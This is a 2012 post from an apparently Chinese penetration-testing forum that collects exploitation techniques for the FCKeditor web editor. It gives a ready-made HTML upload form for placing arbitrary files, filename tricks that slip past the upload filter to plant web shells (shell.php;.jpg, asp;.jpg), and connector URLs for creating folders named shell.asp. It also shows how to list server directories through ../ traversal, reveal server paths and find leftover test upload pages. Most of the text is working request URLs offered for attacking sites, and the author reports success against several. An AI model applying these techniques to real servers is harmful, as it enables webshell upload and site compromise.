中国网络渗透测试联盟
标题:
Fckeditor漏洞 (2)
[打印本页]
作者:
admin
时间:
2012-9-13 17:01
标题:
Fckeditor漏洞 (2)
Fckeditor漏洞利用总结
8 H0 w- i& M5 w$ M |5 ^' y' f
查看编辑器版本
/ n6 B8 d, u( C% A/ w, z3 O) t
FCKeditor/_whatsnew.html
" K0 w% i3 @- z1 G. @4 D
—————————————————————————————————————————————————————————————
$ h% E$ O, M: }" V1 p0 ]
# o2 z1 _- z6 E2 ]
2. Version 2.2 版本
: [- u' P: z: g5 i/ n9 f! H
Apache+linux 环境下在上传文件后面加个.突破!测试通过。
, B" ?+ B) V0 A6 R# @
—————————————————————————————————————————————————————————————
3 z) R, d6 B0 S, G3 a/ I; Q) W
8 i& O0 b! J x* f& s# [* f
3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
6 ?+ |! b$ Z! T* h
<form id="frmUpload" enctype="multipart/form-data"
6 }% A* O1 p6 H, V" v& g: ]- d
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
& K- b5 X8 [: f) k- J0 \! O
<input type="file" name="NewFile" size="50"><br>
9 n1 ?. f2 F, f# R) ^
<input id="btnUpload" type="submit" value="Upload">
/ E$ q" q: [+ J1 u8 J0 B# o2 L Q
</form>
" a( {1 u( b# T6 M& p' g% _+ {
—————————————————————————————————————————————————————————————
% K% I$ J& a( x1 ~: g. N0 R) y. ~
; _0 u- y/ e G7 I0 \
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
- { X: v& T3 ?# E
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
~+ ^6 P7 U& @1 L) n2 [" \/ Q. H+ q
4.1:提交shell.php+空格绕过
$ ]6 W6 E: q. ~& {
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
7 {; t$ v9 O$ N0 q
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
; o) p3 ]1 s/ o' w8 a' {6 o/ Q
—————————————————————————————————————————————————————————————
3 \" ?5 z" q1 t# K* D
6 C7 {, h5 X& ?% F4 B; M
5. 突破建立文件夹
2 D8 r; I$ M( V+ s# H
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
, x. m* p6 L; Y
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp
1 M! d* o6 q" s3 O
—————————————————————————————————————————————————————————————
& `- U8 v) t! H+ h* _' x
6 J& w. ]' N" a9 C i
6. FCKeditor 中test 文件的上传地址
j4 j6 H' @; `, X- f" Z3 X! z- U
FCKeditor/editor/filemanager/browser/default/connectors/test.html
. g6 O7 M8 z1 E3 M/ D# U3 }
FCKeditor/editor/filemanager/upload/test.html
$ J5 @. j0 w3 R. |( w2 t
FCKeditor/editor/filemanager/connectors/test.html
1 u0 b C' }- X. e* X; R1 F/ _4 _. \8 z
FCKeditor/editor/filemanager/connectors/uploadtest.html
' W: c4 f- A. O2 v7 f
—————————————————————————————————————————————————————————————
/ d+ h: L8 z( {7 g
1 t$ L! T" N; \0 m; V( t0 [2 A
7.常用上传地址
, R* h8 Q! G3 {! R
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
S) |; h& d1 T) B/ M3 q
FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
1 X4 V" S; ?! H4 Q6 t2 l! S7 J
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)
$ T. K& z, L! p! I
JSP 版:
1 W4 I6 d- E8 j* L' ?- @
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
0 p& _- \, T( ]% [5 ? |- \* K
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
: T& V3 y8 E( d5 n. K; y
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。
0 O7 x4 h; e2 c
—————————————————————————————————————————————————————————————
$ l/ Q" E+ z4 f
, d+ y! l0 D2 g( L9 u: H6 q! C9 b
8.其他上传地址
. u* ?3 W+ D0 h1 f R) D+ |; Y
FCKeditor/_samples/default.html
* \& f3 b" J1 E6 r
FCKeditor/_samples/asp/sample01.asp
! Q/ U3 P0 t( F; h7 B7 {: R
FCKeditor/_samples/asp/sample02.asp
: p2 r3 \% _' D E5 i0 q- P
FCKeditor/_samples/asp/sample03.asp
, J: `( }* }: G
FCKeditor/_samples/asp/sample04.asp
+ S0 ?1 \& l4 U' t# d
一般很多站点都已删除_samples 目录,可以试试。
) V. w5 V% e3 j7 f% n
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
L4 m$ Y1 }# H. o G
—————————————————————————————————————————————————————————————
; d. G0 r. m8 I! n
6 m: B" `' j' E, n
9.列目录漏洞也可助找上传地址
' m* T) m# N5 G* `0 f
Version 2.4.1 测试通过
7 }" h2 ?9 h" e5 D' u; i% H9 Y
修改CurrentFolder 参数使用 ../../来进入不同的目录
. q$ o4 ]5 b; o3 G
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp
0 _4 d* O. O. f& d0 F" x
根据返回的XML 信息可以查看网站所有的目录。
3 M6 M; @. Y" @. H7 t
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
; w+ n/ j; f- e2 [! B1 ]' B
也可以直接浏览盘符:
% O- V% s' a' C9 D5 M! E5 G- Q* ~/ J
JSP 版本:
& z, q ]/ C6 R% v2 ]
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
6 Q5 ?4 j# R3 D' t
—————————————————————————————————————————————————————————————
- {/ D4 \2 j; w. V1 c2 M+ e- v
4 n/ V9 X1 P( I
10.爆路径漏洞
" U' n1 H6 R$ g: o8 G+ a
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
' a( `& e/ n& w" a
—————————————————————————————————————————————————————————————
! `. ^7 G3 O+ {
- g% E2 Z4 z8 l w
11. FCKeditor 被动限制策略所导致的过滤不严问题
' T+ w- v7 h0 X7 S7 [" ?4 w
影响版本: FCKeditor x.x <= FCKeditor v2.4.3
0 p/ a. L& K) g* Q2 }
脆弱描述:
! x2 d! ?# A, |2 y N) k( m
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:
" e9 L& m7 h) a# D$ _
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
& g4 h [0 Y6 \5 L7 N
Fckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!
# @8 ]! I" I, ~
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
/ D+ t4 ]+ l+ D' A) L6 B8 p M% P
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!
9 @( W' @ D- c& K0 i y' O
—————————————————————————————————————————————————————————————
* i2 \. o9 | D3 a- N
4 P. r0 ~7 @- ~& g8 O
12.最古老的漏洞,Type文件没有限制!
. ^ v8 Y! w, P! T* Q/ {
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
, ]" {: g( B1 B
—————————————————————————————————————————————————————————————
; i; r# @: a' R1 M* p+ g
8 Y& M$ X4 ?/ u. C5 X4 c
===============================================================================================================================================
' d" H6 _$ @1 l# Q: }2 W: ?7 X
8 w3 B, Q3 T& X( f# ^8 e7 K y
FCK编辑器jsp版本漏洞:
. Q0 [6 q+ V( x& o
8 i* t; f e! }. U+ ?# c, g% `. Y
) C1 U& x- G8 m! E, b: I
http://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
8 p+ @' N! }; c6 K. b5 z) N% }4 }
1 Q1 b* n8 i' N: i0 ^
上传马所在目录
' ~; F. e: `* c; h
FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
2 W ? |# D; j) p# R9 Z9 |7 z
上传shell的地址:
# S) h( g6 A5 W$ [8 h" b
http://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
: M9 U5 a$ ^( b; t H$ c4 F% u$ C4 Q
跟版本有关系.并不是百分百成功. 测试成功几个站.
7 t# D9 u( Z8 K; L a) Q8 u
不能通杀.很遗憾.
! j4 s- f$ K5 _' z
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector
8 t) N, S9 D( V+ M8 `+ z
如果以上地址不行可以试试
# e: F7 v4 s/ t- }( e
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
+ N1 G/ k- C. {, @& x# N1 `
FCKeditor/_samples/
: j! i" Y2 I+ d' l x$ p$ O
FCKeditor/_samples/default.html
8 K Z" q9 C1 ]
FCKeditor/editor/fckeditor.htm
- c W" }* ~8 _ \; t
FCKeditor/editor/fckdialog.html
: d0 A( V! f; q6 Z) O6 x
8 V0 F* f0 X7 j9 Z) H5 ~
1 x* {* M" l3 O/ @" u
1 ]' F' S8 j2 c6 Z; ^& p3 _ J
解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
6 |5 @( _7 {8 K
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2